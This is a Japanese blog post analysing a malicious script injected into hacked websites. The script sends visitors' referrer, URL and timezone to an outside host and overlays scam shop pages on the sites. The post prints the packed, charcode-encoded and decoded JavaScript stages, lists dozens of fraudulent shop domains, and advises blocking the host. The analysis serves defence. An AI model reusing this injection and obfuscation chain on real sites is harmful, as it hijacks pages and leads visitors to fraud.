ここから本文です
☆女の徒然草☆
徒然なるままに、おんなもすなるブラというものをおとこもしてみんとてするなり

書庫全体表示

https://blogs.c.yimg.jp/res/blog-b4-f9/yoshimy_s/folder/503455/89/16428989/img_1?1344636633
https://blogs.c.yimg.jp/res/blog-b4-f9/yoshimy_s/folder/503455/72/11814372/img_0?1301538305
(要約)
新たにドメイン「sendsoed.com」に置いてあるスクリプトを利用して
他人のサイトへ自分で開設している詐欺ページを上書き表示させているのを見つけました。
おそらくこのブログを知っていて、スクリプトを複雑にしているのでしょうね。
スクリプトの内部がこれまでよりパワーアップされていて、さらに解読困難となっています。

http://c.statcounter.com/4440886/0/1c5b0b72/0/ 

閲覧者接続情報 http://www.robtex.com/ipinfo.gif


新たにドメイン「sendsoed.com」に置いてあるスクリプトを利用して
他人のサイトへ自分で開設している詐欺ページを上書き表示させているのを見つけました。

おそらくこのブログを知っていて、スクリプトを複雑にしているのでしょうね。
スクリプトの内部がこれまでよりパワーアップされていて、さらに解読困難となっています。


感染スクリプトの事例 http://sendsoed.com/smycmt.js

ソースコードはDean Edwards' Packer でパッキングされています。

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':
e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):
c.toString(36))};if(!''.replace(/^/,String)){while(c--)
{d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];
e=function(){return'\\w+'};c=1};
while(c--){if(k[c])
{p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}
('t(e.d(p,7,1,h,1,0,c,0,1,8,0,3,5,2,g,0,C,D,y,x,2,9,b,2,3,0,3,4,i,g,2,5,q,9,
0,3,4,j,1,0,c,0,1,1,0,1,f,s));
t(e.d(p,7,1,h,m,1,0,c,8,0,3,5,2,g,0,C,D,y,x,2,9,b,2,3,0,3,4,i,w,2,5,7,4,l,2,
3,j,m,1,0,c,f,s));
t(e.d(p,7,1,h,u,2,3,0,8,i,3,0,z,h,K,7,4,0,i,f,j,r,0,4,I,l,9,0,u,2,3,0,G,c,c,
6,0,4,i,f,k,H,J,f,E,i,F,R,f,s));
T a=e.d(A,6,5,1,l,b,4,h,w,7,3,r,q,7,r,0,8,o,U,7,p,7,6,5,1,l,b,4,o,h,6,1,5,8,
o,m,4,4,b,V,k,k,6,0,3,g,6,2,0,g,j,5,2,9,k,6,9,n,5,9,4,j,b,m,b,W,S,q,0,1,n,8,
6,7,g,2,z,6,L,n,N,6,9,n,5,9,4,v,1,0,c,0,1,8)+M+e.d(v,m,1,0,c,8)
+O+e.d(v,u,2,3,0,8)+P+e.d(o,B,A,k,6,5,1,l,b,4,B);Q.X(a)',60,60,
'101|114|111|110|116|99|115|97|61|109||112|102|fromCharCode|String|41|100
|32|40|46|47|105|104|121|34|118|117|103|59|eval|122|38|108|67|73|119|60|62
|85|82|42|45|79|54|84|48|68|107|refer|95|href|zone|document|49|113|var|106
|58|63|write'.split('|'),0,{}))




解読するとアスキーコードで書かれているスクリプトになりました。

eval(String.fromCharCode(118,97,114,32,114,101,102,101,114,61,101,110,
99,111,100,101,85,82,73,67,111,109,112,111,110,101,110,116,40,100,111,99,
117,109,101,110,116,46,114,101,102,101,114,114,101,114,41,59));
eval(String.fromCharCode(118,97,114,32,104,114,101,102,61,101,110,99,
111,100,101,85,82,73,67,111,109,112,111,110,101,110,116,40,108,111,99,97,
116,105,111,110,46,104,114,101,102,41,59));
eval(String.fromCharCode(118,97,114,32,122,111,110,101,61,40,110,101,119,
32,68,97,116,101,40,41,46,103,101,116,84,105,109,101,122,111,110,101,79,
102,102,115,101,116,40,41,47,54,48,41,42,40,45,49,41,59));
var a=String.fromCharCode(60,115,99,114,105,112,116,32,108,97,110,103,117,
97,103,101,61,34,106,97,118,97,115,99,114,105,112,116,34,32,115,114,99,61,
34,104,116,116,112,58,47,47,115,101,110,100,115,111,101,100,46,99,111,109,
47,115,109,121,99,109,116,46,112,104,112,63,113,117,101,114,121,61,115,97,
100,111,119,115,107,121,95,115,109,121,99,109,116,38,114,101,102,101,114,61)
+refer+String.fromCharCode(38,104,114,101,102,61)+href
+String.fromCharCode(38,122,111,110,101,61)+zone
+String.fromCharCode(34,62,60,47,115,99,114,105,112,116,62);
document.write(a)




アスキーコードを文字化すると、このようになります。

eval('var refer=encodeURIComponent(document.referrer);');
eval('var href=encodeURIComponent(location.href);');
eval('var zone=(new Date().getTimezoneOffset()/60)*(-1);');
var a='<script language="javascript" src="http://sendsoed.com/smycmt.php?
query=sadowsky_smycmt&refer='+refer+'&href='+href+'&zone='+zone+'">
</script>';document.write(a)




さらに次のアドレスを読み取りますが、
この時にタイムゾーンを与えないと次のスクリプトを得られない制御をしています。


タイムゾーンがないと読み取れない
http://sendsoed.com/smycmt.php?query=sadowsky_smycmt&refer=&href=&zone=
HTTP/1.1 200 OK
Server: NginxPlus
Date: Tue, 26 Jan 2016 03:10:53 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/5.3.29





日本時間を指定した場合は読み取れます
http://sendsoed.com/smycmt.php?query=sadowsky_smycmt&refer=&href=&zone=9
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};
if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}
k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)
{if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}
('i 2=(d c().e()/f)*(-1);h(2==9){b.a.4.3="<5 6=\'8%\' 7=\'g\' j=\'t\' s=\'0\'
v=\'w://x.u.r/l.k?m=n&p=1&o=q\'>"}',34,34,'||tzo|innerHTML|body|iframe|width
|scrolling|100||document|top|Date|new|getTimezoneOffset|60|no|if|var|height|php
|index|main_page|advanced_search_result|keyword|search_in_description
|sadowsky|space|frameborder|6000|cimvqbb|src|http|www'.split('|'),0,{}))





Dean Edwards' Packer をアンパッキングするとフレーム記述が現れます
var tzo=(new Date().getTimezoneOffset()/60)*(-1);
  if(tzo==9)
    {top.document.body.innerHTML=
     "<iframe width='100%' scrolling='no' height='6000' frameborder='0'
       src='http://www.cimvqbb.space/index.php?main_page=advanced_search_result
            &search_in_description=1&keyword=sadowsky'>"
    }






このように複雑な仕組みを利用していてもプログラムでまとめて解析しますので、
寄生しているサイトを容易に割り出せるんですよ。

結局、sendsoed.com に置いてある100本ほどのスクリプトを自動解析した結果、
次のサイトが他人のサイトへ寄生感染していると判明しました。


他人のサイトをハッキングして寄生している詐欺サイト

超格安  洗濯機  最安値に挑戦!
 ⇒ http://www.ahfmeaz.top/
最新人気ヴィア ドアン【本物保証】
 ⇒ http://www.ahoqawc.review/
【正規店新登場】 マンダリナダック 【本物保証】
 ⇒ http://www.amiuryh.faith/
新作激安登場!(ツモリチサト)人気売れ筋ランキング 激安専門店!
 ⇒ http://www.apmkglk.date/
大人気沸騰する 【コート】!【品質保証】
 ⇒ http://www.bpkbdd.top/
【正規店新登場】アルファ【品質超便利】
 ⇒ http://www.byalmlw.club/
衝撃価格!ギター 【本物保証】
 ⇒ http://www.cimvqbb.space/
【最短翌日配送】 スーツケース【信用第一】
 ⇒ http://www.clgkswv.club/
2015年新しい 電子ピアノ【品質保証】
 ⇒ http://www.cmqzirc.space/
※超美品※人気ルコライン【品質超便利】
 ⇒ http://www.cushfcb.trade/
人気満点 カメラ! 新作大特集 が買い安い!
 ⇒ http://www.emvjscy.space/
最新人気  家具  【品質保証】
 ⇒ http://www.erfvosw.top/
【正規店新登場】 ジュエリー 【大好評2015】
 ⇒ http://www.erscszw.faith/
大人気沸騰する ラベンハム!【品質保証】
 ⇒ http://www.fenbqq.top/
【品質保証】  コンバース 人気通販店!
 ⇒ http://www.fhwngla.top/
特価【新品】 ロンワンズ 2015激安専門店
 ⇒ http://www.fxpijxf.faith/
【大特価2015】スノーボード  【品質第一】
 ⇒ http://www.gyuudca.space/
衝撃価格! ラルディーニ  激安通販店
 ⇒ http://www.hemxmxz.review/
大人気沸騰するブリーフィング!【品質保証】
 ⇒ http://www.hfcrwye.xyz/
限定独占販売  ステレオ  【品質第一】
 ⇒ http://www.innzitl.space/
最新入荷の  スカーフ   激安通販店
 ⇒ http://www.iyqikwv.review/
新作大特集 タリアトーレ【正規店新登場】
 ⇒ http://www.jpndrdw.pw/
【驚きの低価格】スノーブーツ 【100%品質保障】
 ⇒ http://www.kassytk.faith/
新鮮感人気  プロテカ【100%品質保障】
 ⇒ http://www.kdehvpq.pw/
超人気特価!カーナビゲーション を海外通販 人気売れ筋ランキング!
 ⇒ http://www.laatry.ren/
大人気沸騰するミシン!【品質保証】
 ⇒ http://www.lahped.top/
【正規店新登場】ピューテリー【品質超便利】
 ⇒ http://www.lqpijnn.club/
【正規店新登場】ワイルドシングス【品質超便利】
 ⇒ http://www.okconlo.club/
特価【新品】 ノルディスク 2015激安専門店
 ⇒ http://www.ornzqck.faith/
【品質第一】 小川キャンパル【本物保証】
 ⇒ http://www.orvdmyn.pw/
※超美品※人気ヤンコ【品質超便利】
 ⇒ http://www.osqirnb.trade/
ベビー用品 史上最安値の人気通販店
 ⇒ http://www.pazmylq.racing/
超人気特価!【 ランドセル】 を海外通販 人気売れ筋ランキング!
 ⇒ http://www.prnvdn.ren/
大人気沸騰する チペワ/CHIPPEWA!【品質保証】
 ⇒ http://www.qfrgyr.top/
人気満点  ジューサー 【品質保証】
 ⇒ http://www.qpidybt.space/
超人気特価!【karrimor / カリマー】 を海外通販 人気売れ筋ランキング!
 ⇒ http://www.qyiugzza.trade/
2015正規販売  ジョンストンズ  激安通販店
 ⇒ http://www.sxbbxcc.top/
【正規店新登場】ジョンスメドレー【品質超便利】
 ⇒ http://www.vananql.club/
2015激安専門店 スポーツシューズ 【100%品質保障】
 ⇒ http://www.vavcyso.top/
【正規店新登場】ヨースケ【品質超便利】
 ⇒ http://www.vbdfplc.club/
【低価格は当店】 クレドラン【驚きの低価格】
 ⇒ http://www.vfpwxah.review/
【最安値入荷】 サマンサタバサ 【正規品取扱店】
 ⇒ http://www.vseognw.faith/
【大特価2015】  レーダー探知機  人气専門店
 ⇒ http://www.wbpgrep.online/
おしゃれな! キッチン用品 特価高品質 !新作大特集
 ⇒ http://www.wfmtktp.pw/
人気満点 運動器械! 新作大特集 が買い安い!
 ⇒ http://www.wxqeiam.space/
新作激安登場!DANTON/ダントン 人気売れ筋ランキング 激安専門店!
 ⇒ http://www.xmhcdcd.club/
衝撃価格!ゴヤール  2015激安専門店
 ⇒ http://www.xtkzrdk.club/
特価【新品】 スケートボード   スケート  正規通販店
 ⇒ http://www.zkfkqyf.win/
生活家電特価高品質 !新作大特集
 ⇒ http://www.zxeqrpp.online/





ドメイン「sendsoed.com」には悪質なスクリプトが置かれています。
ファイアーウォールでブロックするようにしてくださいね。




顔アイコン

顔アイコン・表示画像の選択

絵文字
×
  • オリジナル
  • SoftBank1
  • SoftBank2
  • SoftBank3
  • SoftBank4
  • docomo1
  • docomo2
  • au1
  • au2
  • au3
  • au4
  • 名前
  • パスワード
  • ブログ

開くトラックバック(1)

本文はここまでですこのページの先頭へ
みんなの更新記事